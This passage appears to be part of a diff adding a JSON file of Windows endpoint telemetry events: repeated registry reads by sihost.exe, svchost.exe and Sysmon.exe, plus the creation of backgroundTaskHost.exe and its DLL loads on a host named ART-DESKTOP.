"pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_value": "HostActivityManager", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager\\Volatile", + "registry_value": "Volatile", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA30CB855", + "registry_value": "41C64E6DA30CB855", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca", + "event_type": "process", + "logon_id": 217097, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 6376, + "ppid": 780, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "subtype": "create", + "timestamp": 131883571688960000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}", + "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571688860000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571689020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 